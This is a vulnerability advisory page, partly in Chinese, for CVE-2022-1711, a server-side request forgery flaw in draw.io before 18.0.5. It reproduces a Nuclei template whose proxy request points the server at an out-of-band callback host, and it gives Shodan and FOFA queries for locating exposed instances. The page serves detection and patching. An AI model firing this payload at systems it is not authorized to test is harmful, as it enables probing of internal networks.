CVE-2022-1711: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)

日期: 2025-08-01 | 影响软件: draw.io | POC: 已公开

漏洞描述

Server-Side Request Forgery (SSRF) vulnerability in draw.io (also known as diagrams.net) prior to version 18.0.5 allows attackers to bypass URL validation restrictions in the ProxyServlet component. The vulnerability exists because the application does not properly validate URLs passed to its proxy endpoint, allowing attackers to make requests to internal services or external servers. This can lead to unauthorized access to internal resources and potential data exfiltration.

PoC代码[已公开]

id: CVE-2022-1711

info:
  name: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)
  author: ritikchaddha
  severity: high
  description: |
    Server-Side Request Forgery (SSRF) vulnerability in draw.io (also known as diagrams.net) prior to version 18.0.5 allows attackers to bypass URL validation restrictions in the ProxyServlet component. The vulnerability exists because the application does not properly validate URLs passed to its proxy endpoint, allowing attackers to make requests to internal services or external servers. This can lead to unauthorized access to internal resources and potential data exfiltration.
  remediation: |
    Update to draw.io/diagrams.net version 18.0.5 or later. The patch adds isLinkLocalAddress() checks to restrict proxy request destinations. If patching isn't possible, implement network controls to limit server connections to internal systems.
  reference:
    - https://huntr.dev/bounties/c32afff5-6ad5-4d4d-beea-f55ab4925797
    - https://github.com/jgraph/drawio/commit/cf5c78aa0f3127fb10053db55b39f3017a0654ae
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1711
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1711
    cwe-id: CWE-918
    epss-score: 0.26189
    epss-percentile: 0.96118
  metadata:
    vendor: diagrams
    product: drawio
    verified: true
    shodan-query: html:"draw.io"
    fofa-query: body="draw.io"
  tags: cve,cve2022,ssrf,drawio,diagrams,jgraph

http:
  - method: GET
    path:
      - "{{BaseURL}}/proxy?url=http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(interactsh_protocol, 'dns')"
          - "contains(content_type, 'application/octet-stream')"
        condition: and
# digest: 4b0a00483046022100f1bb85edeaa57020ebc96c06c64b70a9299e2ee87c5ff95e2744db9630e7baf7022100839a839745c43097099095500307bb21d2f898a18eff743de7acbc5250035b62:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1711.yaml